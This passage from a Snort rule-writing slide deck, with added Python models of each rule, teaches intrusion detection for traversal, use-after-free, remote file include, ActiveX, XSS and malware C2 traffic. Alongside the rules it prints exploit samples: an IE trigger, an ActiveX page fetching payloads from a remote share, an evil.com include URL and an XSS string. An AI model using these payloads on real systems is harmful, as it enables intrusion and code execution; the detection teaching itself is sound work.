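    if "/wlevs/visualizer/upload" not in uri:          # content; fast_pattern:only; http_uri
        return None
    low = body.lower()
    if "filename" in low and "content-disposition" in low and MULTIPART_PCRE.search(body):
        return "multipart"
    if "filename=" in low and URLENCODED_PCRE.search(body):
        return "urlencoded"
    return None


def multipart_body(filename):
    """Constructed multipart/form-data body in the shape shown on the exploit slide."""
    b = "_Part_732_2993821416_1334322828"
    return (f"--{b}\r\n"
            f'Content-Disposition: form-data; name="uploadfile"; filename="{filename}"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n"
            "#pragma namespace(...)\r\n"
            f"--{b}--\r\n")


UPLOAD = "/wlevs/visualizer/upload"
TRAVERSAL_M  = multipart_body("../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof")
NORMAL_M     = multipart_body("report..2014/q3.txt")      # dots and a slash, but no "../"
TRAVERSAL_U  = "uploadfile=data&filename=..%2F..%2Fweb.xml"  # "&" alternative, encoded slashes
TRAVERSAL_U2 = "filename=..\\..\\web.xml"                 # "^" alternative, backslashes

if __name__ == "__main__":
    for body in (TRAVERSAL_M, NORMAL_M, TRAVERSAL_U, TRAVERSAL_U2):
        print(traversal_match(UPLOAD, body))
```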

Page 54: Introduction to Snort Rule Writing

Detection Topics

  Buffer Overflow
  Command Injection
  Directory Traversal
> Use-After-Free
  Remote File Include
  Browser Plugins
  Cross Site Scripting
  Malware Command Traffic

Page 55: Introduction to Snort Rule Writing

Use-After-Free Overview

CVE-2013-3893

This vulnerability is triggered by Javascript that sets an onlosecapture() handler on the parent of two elements. This handler clears the DOM with document.write() when it is called. The Javascript then calls setCapture() on the parent and the child element. This triggers the onlosecapture() handler, freeing a reference with document.write(). After the free, the invalid reference will remain, causing a crash (or code execution) in MSHTML!CTreeNode::GetInterface.

Page 56: Introduction to Snort Rule Writing

Use-After-Free Trigger

function trigger() {
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");
    document.body.appendChild(id_0);
    document.body.appendChild(id_1);
    id_1.applyElement(id_0);
    id_0.onlosecapture = function(e) {
        document.write("");
    }
    id_0.setCapture();
    id_1.setCapture();
}

Page 57: Introduction to Snort Rule Writing

Use-After-Free Trigger

0:005> r
eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34
eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
MSHTML!CTreeNode::GetInterface+0xd8:
679b6b61 8b08            mov     ecx,dword ptr [eax]  ds:0023:41414141=????????

Page 58: Introduction to Snort Rule Writing

Use-After-Free Detection

alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any ( \
    msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; \
    flow:to_client,established; \
    file_data; \
    content:".applyElement"; nocase; \
    content:".onlosecapture"; nocase; within:500; fast_pattern; \
    content:".setCapture"; nocase; within:500; \
    content:".setCapture"; nocase; within:500; \
    pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si"; \
    metadata:service ftp-data, service http, service imap, service pop3; \
    reference:cve,2013-3893; \
)

Page 59: Introduction to Snort Rule Writing

Use-After-Free Detection

alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 ( \
    msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; \
    flow:to_server,established; \
    file_data; \
    content:".applyElement"; nocase; \
    content:".onlosecapture"; nocase; within:500; fast_pattern; \
    content:".setCapture"; nocase; within:500; \
    content:".setCapture"; nocase; within:500; \
    pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si"; \
    metadata:service smtp; \
    reference:cve,2013-3893; \
)
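The interesting part of the two rules above is the pcre: the named group (?P<var>\w+) captures the element passed to applyElement and the (?P=var) backreferences require the onlosecapture handler and a setCapture call on that same element. Python's re accepts this syntax unchanged, so the added model below uses the regex verbatim and runs the content chain before it. It is not Snort's engine or code from this deck; the second sample is constructed to pass the four content checks and fail only the pcre.

```python
import re

# Added example: the onlosecapture rule's file_data checks modelled in Python.
# The pcre's named group and backreference ((?P<var>\w+) ... (?P=var)) are
# valid in Python's re as well, so the regex is used verbatim. Not Snort's engine.

ONLOSECAPTURE_PCRE = re.compile(
    r"\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture",
    re.DOTALL | re.IGNORECASE)   # /si


def onlosecapture_match(file_data):
    low = file_data.lower()
    pos = low.find(".applyelement")                 # content:".applyElement"; nocase
    if pos == -1:
        return False
    cursor = pos + len(".applyelement")
    # .onlosecapture, then .setCapture twice, each within 500 bytes of the previous match
    for pat in (".onlosecapture", ".setcapture", ".setcapture"):
        hit = low.find(pat, cursor, cursor + 500)
        if hit == -1:
            return False
        cursor = hit + len(pat)
    # the pcre ties the three calls to the same variable name
    return ONLOSECAPTURE_PCRE.search(file_data) is not None


# Constructed samples: the trigger from the slide, and unrelated code that uses
# the same three method names on different objects
TRIGGER_JS = """
function trigger() {
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");
    document.body.appendChild(id_0);
    document.body.appendChild(id_1);
    id_1.applyElement(id_0);
    id_0.onlosecapture = function(e) { document.write(""); }
    id_0.setCapture();
    id_1.setCapture();
}
"""
UNRELATED_JS = """
wrapper.applyElement(inner);
panel.onlosecapture = onLost;
panel.setCapture();
canvas.setCapture();
"""

if __name__ == "__main__":
    print(onlosecapture_match(TRIGGER_JS))     # True
    print(onlosecapture_match(UNRELATED_JS))   # False: contents pass, the pcre fails
```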

Page 61: Introduction to Snort Rule Writing

Detection Topics

  Buffer Overflow
  Command Injection
  Directory Traversal
  Use-After-Free
> Remote File Include
  Browser Plugins
  Cross Site Scripting
  Malware Command Traffic

Page 62: Introduction to Snort Rule Writing

Remote File Include Overview

CVE-2008-5053

Remote file include vulnerability in Joomla Simple RSS Reader allows execution of arbitrary PHP code via the parameter mosConfig_live_site in administrator/components/com_rssreader/admin.rssreader.php:

include("$mosConfig_live_site/components/com_rssreader/about.html");

$mosConfig_live_site is obtained from the GET parameter of the same name sent to admin.rssreader.php.

Exploit:

http://site/joomlapath/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://evil.com/

Page 63: Introduction to Snort Rule Writing

Remote File Include Detection

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
    msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt"; \
    flow:to_server,established; \
    content:"admin.rssreader.php"; fast_pattern:only; http_uri; \
    content:"mosConfig_live_site="; nocase; http_uri; \
    pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui"; \
    metadata:service http; \
    reference:cve,2008-5053; \
    classtype:web-application-attack; \
)

Page 65: Introduction to Snort Rule Writing

Detection Topics

  Buffer Overflow
  Command Injection
  Directory Traversal
  Use-After-Free
  Remote File Include
> Browser Plugins
  Cross Site Scripting
  Malware Command Traffic

Page 66: Introduction to Snort Rule Writing

Browser Plugin Overview

CVE-2012-2516

GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help functionality for the Proficy enterprise data collection system. It can be instantiated in a web page using the <object> tag, for example:

<object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681">

Or using Javascript:

obj = new ActiveXObject("KeyHelp.KeyScript")

Page 67: Introduction to Snort Rule Writing

Browser Plugin Overview

The API of this ActiveX object exposes several methods including LaunchTriPane(), which has the following prototype:

Void LaunchTriPane(System.string ChmFile)

The function LaunchTriPane will use ShellExecute to launch hh.exe, with user controlled data as parameters:

> HH.EXE -decompile D:/destination-folder C:/test.chm

This can be abused to write arbitrary files. Code execution is possible by uploading a WMI .mof file.

Page 68: Introduction to Snort Rule Writing

Browser Plugin Disassembly

KeyHelp.ocx:

5D335165  CALL KeyHelp.5D31797F
5D33516A  JMP SHORT KeyHelp.5D33517D
5D33516C  PUSH 5
5D33516E  PUSH EDI
5D33516F  PUSH ESI                    ; Malicious command line parameters - no validation
5D335170  PUSH KeyHelp.5D347950       ; ASCII "hh.exe"
5D335175  PUSH EDI
5D335176  PUSH EDI
5D335177  CALL SHELL32.ShellExecuteA  ; run hh.exe with malicious params
5D33517D  CMP ESI,EDI
5D33517F  JE SHORT KeyHelp.5D335187
5D335181  PUSH ESI

Page 69: Introduction to Snort Rule Writing

Browser Plugin Exploit

<html><body><script>
KeyScript = new ActiveXObject("KeyHelp.KeyScript");

ChmPayloadFile = "-decompile C:\\WINDOWS\\system32\\ " +
                 "\\\\172.16.211.1\\1A5vTb1QLAqfif\\DoixwWS.chm";

ChmMofFile = "-decompile c:\\WINDOWS\\system32\\wbem\\mof\\ " +
             "\\\\172.16.211.1\\1A5vTb1QLAqfif\\QLQklKr.chm";

KeyScript.LaunchTriPane(ChmPayloadFile);
setTimeout('KeyScript.LaunchTriPane(ChmMofFile);', 3000);
</script></body></html>

Page 70: Introduction to Snort Rule Writing

Browser Plugin Detection

#
# <OBJECT> Detection
#
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
    msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; \
    flow:to_client,established; \
    file_data; \
    content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only; \
    content:"LaunchTriPane"; nocase; \
    metadata:policy security-ips drop, service http; \
    reference:cve,2012-2516; \
    classtype:attempted-user; \
)

Page 71: Introduction to Snort Rule Writing

Browser Plugin Detection

#
# Javascript Detection
#
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
    msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; \
    flow:to_client,established; \
    file_data; \
    content:"KeyHelp.KeyScript"; fast_pattern:only; \
    content:"LaunchTriPane"; nocase; \
    metadata:policy security-ips drop, service http; \
    reference:cve,2012-2516; \
    classtype:attempted-user; \
)

Page 73: Introduction to Snort Rule Writing

Detection Topics

  Buffer Overflow
  Command Injection
  Directory Traversal
  Use-After-Free
  Remote File Include
  Browser Plugins
> Cross Site Scripting
  Malware Command Traffic

Page 74: Introduction to Snort Rule Writing

Cross Site Scripting (XSS) Overview

OSVDB-89893

Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient sanitization of 'width' and 'height' parameters sent to the URI:

/includes/components/alertcloud/index.php

Exploit:

/nagiosxi/includes/components/alertcloud/index.php?height=4"}}; alert('XSS'); var aa={"A":{"B":"

Page 75: Introduction to Snort Rule Writing

Cross Site Scripting (XSS) Detection

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \
    msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt"; \
    flow:to_server,established; \
    content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri; \
    pcre:"/[?&](height|width)=[^&]*?([\x22\x27\x3c\x3e\x28\x29]|script|onload|src)/Ui"; \
    metadata:service http; \
    reference:url,osvdb.org/show/osvdb/89893; \
    classtype:web-application-attack; \
)
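The Joomla remote file include rule (Page 63) and the Nagios XI cross site scripting rule above follow the same shape: a fast_pattern on the script path in http_uri, then a pcre with the /U flag that inspects one query parameter in the normalized URI. The added model below runs both over constructed URIs. It is not Snort's HTTP inspector or code from this deck; normalization is approximated by a single percent-decoding pass and Python's re stands in for PCRE.

```python
import re
from urllib.parse import unquote

# Added example covering the Joomla remote file include rule and the Nagios XI
# cross site scripting rule above: both inspect the normalized URI (http_uri,
# pcre /U). Normalization is approximated by one percent-decoding pass and
# Python's re stands in for PCRE; this is a model, not Snort's engine.

RFI_PCRE = re.compile(r"[?&]mosConfig_live_site=[^&]*?(http|ftp)", re.IGNORECASE)
XSS_PCRE = re.compile(
    r"[?&](height|width)=[^&]*?([\x22\x27\x3c\x3e\x28\x29]|script|onload|src)",  # " ' < > ( )
    re.IGNORECASE)


def rssreader_rfi_match(raw_uri):
    uri = unquote(raw_uri)
    if "admin.rssreader.php" not in uri:                    # content; fast_pattern:only; http_uri
        return False
    if "mosconfig_live_site=" not in uri.lower():           # content; nocase; http_uri
        return False
    return RFI_PCRE.search(uri) is not None


def nagios_xss_match(raw_uri):
    uri = unquote(raw_uri)
    if "/includes/components/alertcloud/index.php" not in uri:  # content; fast_pattern:only; http_uri
        return False
    return XSS_PCRE.search(uri) is not None


# Constructed URIs; the first of each pair follows the slide's exploit string,
# percent-encoded the way a browser would send it
RFI_URI    = "/joomlapath/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://evil.com/"
RFI_NORMAL = "/joomlapath/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=/var/www/joomla"
XSS_URI    = "/nagiosxi/includes/components/alertcloud/index.php?height=4%22%7D%7D%3B%20alert(%27XSS%27)%3B"
XSS_NORMAL = "/nagiosxi/includes/components/alertcloud/index.php?height=400&width=300"

if __name__ == "__main__":
    for fn, uri in ((rssreader_rfi_match, RFI_URI), (rssreader_rfi_match, RFI_NORMAL),
                    (nagios_xss_match, XSS_URI), (nagios_xss_match, XSS_NORMAL)):
        print(fn.__name__, fn(uri))
```

Note that the RFI pcre fires on any value containing "http" or "ftp" anywhere after the parameter name, so a local path such as /var/www/httpdocs would also match; anchoring the scheme at the start of the value would be tighter, at the cost of missing values with leading whitespace or encoding.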

Page 77: Introduction to Snort Rule Writing

Detection Topics

  Buffer Overflow
  Command Injection
  Directory Traversal
  Use-After-Free
  Remote File Include
  Browser Plugins
  Cross Site Scripting
> Malware Command Traffic

Page 78: Introduction to Snort Rule Writing

Malware Sample Overview

Win.Trojan.Sefnit

Upon execution Win.Trojan.Sefnit drops a service to %AppData%\Updater\updater.dll and starts it. When the service updater.dll starts it attempts to read tasks from the configuration file %AppData%\Updater/~conf.dat

Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the encrypted value, converts it to a 32 character hex string and uses this string as a UUID sent in the initial request to C2:

GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1
Host: axnlze.net
Accept: */*

The URI above has the following hardcoded format:

hxxp://<c2domain>/j/<uuid>/<version>

Page 79: Introduction to Snort Rule Writing

Malware Sample Disassembly

10015B27  PUSH 10112E28                    ; /Arg1 = UNICODE "c2.net/j/<uuid>/<version>"
10015B2C  LEA ECX,DWORD PTR SS:[EBP-4C]    ; |
10015B2F  CALL <_wcslen-copystr>           ; \updater.10001BA4
10015B34  MOV BYTE PTR SS:[EBP-4],1
10015B38  MOV EDI,10112E14                 ; UNICODE "<uuid>"
10015B3D  PUSH EDI                         ; /Arg1 => 10112E14
10015B3E  CALL <_wcslen>                   ; \updater.100196E1
...
10015BBB  PUSH ESI                         ; UNICODE "<version>"
10015BBC  LEA ECX,DWORD PTR SS:[EBP-4C]
10015BBF  CALL <substr_loc>
10015BC4  MOV DWORD PTR SS:[EBP-1DC],EAX
10015BCA  PUSH ESI                         ; UNICODE "<version>"
10015BCB  CALL <_wcslen>
10015BD0  MOV DWORD PTR SS:[EBP-1EC],EAX
10015BD6  MOV EDI,10112E08                 ; UNICODE "0001"
...
1005A043  PUSH 0                           ; /Arg4 = 00000000
1005A045  PUSH ECX                         ; |Arg3 = 008DAA60 ASCII "/j/20a0b8237d5b084e46bd673e26d948bf/0001"
1005A046  PUSH EBX                         ; |Arg2 = 1011B340 ASCII "GET"
1005A047  PUSH EDI                         ; |Arg1 = 008C9138 = NULL
1005A048  CALL 10058E00                    ; \updater.10058E00

Page 80: Introduction to Snort Rule Writing

Malware Command Traffic Detection

#
# C2 request detection
#
# hardcoded urilen
urilen:40,norm; \

# hardcoded uri pattern, begins with "/j/"
content:"/j/"; depth:3; http_uri; \

# ends with "/0001"
content:"/0001"; distance:32; within:5; http_uri; \

# no User-Agent in C2 request
content:!"User-Agent"; http_header; \

# final verification of C2 URI pattern
pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U"; \

Page 81: Introduction to Snort Rule Writing

Malware Command Traffic Detection

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ( \
    msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt"; \
    flow:to_server,established; \
    urilen:40,norm; \
    content:"/j/"; depth:3; http_uri; \
    content:"/0001"; within:5; distance:32; http_uri; \
    content:!"User-Agent"; http_header; \
    pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U"; \
    metadata:impact_flag red, service http; \
    classtype:trojan-activity; \
)
```
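The C2 rule above is a good example of layering cheap checks in front of the pcre: the URI length, the "/j/" prefix at depth 3, "/0001" at a fixed distance, and the absence of a User-Agent header all run before the regex confirms the hex UUID. The added model below runs that sequence over constructed requests shaped like the one on the overview slide. It is not Snort's engine or code from this deck; the URI is taken as already normalized and Python's re stands in for PCRE.

```python
import re

# Added example: the Win.Trojan.Sefnit outbound rule modelled in Python over
# constructed requests. uri is the normalized URI (urilen ...,norm / pcre /U),
# headers is the raw header block the http_header option inspects.
# Not Snort's engine; Python's re stands in for PCRE.

SEFNIT_PCRE = re.compile(r"^\x2fj\x2f[a-f0-9]{32}\x2f0001$")   # /j/<32 lowercase hex>/0001


def sefnit_c2_match(uri, headers):
    if len(uri) != 40:                                   # urilen:40,norm
        return False
    if not uri.startswith("/j/"):                        # content:"/j/"; depth:3; http_uri
        return False
    # content:"/0001"; distance:32; within:5 -> "/0001" must sit exactly 32 bytes after "/j/"
    if uri.find("/0001", 3 + 32, 3 + 32 + 5) == -1:
        return False
    if "User-Agent" in headers:                          # content:!"User-Agent"; http_header
        return False                                     # (no nocase on the slide, so case-sensitive)
    return SEFNIT_PCRE.match(uri) is not None


def request(uri, user_agent=None):
    """Constructed request in the shape of the C2 request on the overview slide."""
    headers = ["Host: axnlze.net", "Accept: */*"]
    if user_agent:
        headers.insert(1, f"User-Agent: {user_agent}")
    return uri, "\r\n".join(headers)


C2_REQUEST      = request("/j/20a0b8237d5b084e46bd673e26d948bf/0001")
BROWSER_REQUEST = request("/j/20a0b8237d5b084e46bd673e26d948bf/0001", "Mozilla/5.0")
OTHER_VERSION   = request("/j/20a0b8237d5b084e46bd673e26d948bf/0002")
SHORT_UUID      = request("/j/20a0b8237d5b084e46bd673e26d948b/0001")

if __name__ == "__main__":
    for name, (uri, hdrs) in (("c2", C2_REQUEST), ("browser", BROWSER_REQUEST),
                              ("version", OTHER_VERSION), ("short", SHORT_UUID)):
        print(f"{name:8}: {sefnit_c2_match(uri, hdrs)}")
```

The negated User-Agent content is case-sensitive as written on the slide; a client that sends the header in lower case would not be excluded by it, which in this rule only makes the match slightly broader, since the remaining checks still require the exact 40 byte URI shape.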

Page 82: Introduction to Snort Rule Writing

Call to Action

• Related sessions:
  • Introduction to Snort Rule Writing
  • Detection Strategies with Snort [DevNet-1126]

• Visit the World of Solutions for
  • Cisco Campus
  • Walk in Labs
  • Technical Solution Clinics

• Meet the Engineer - Available immediately after this talk.

Page 83: Introduction to Snort Rule Writing

Brandon Stultz

talosintel.com

@talossecurity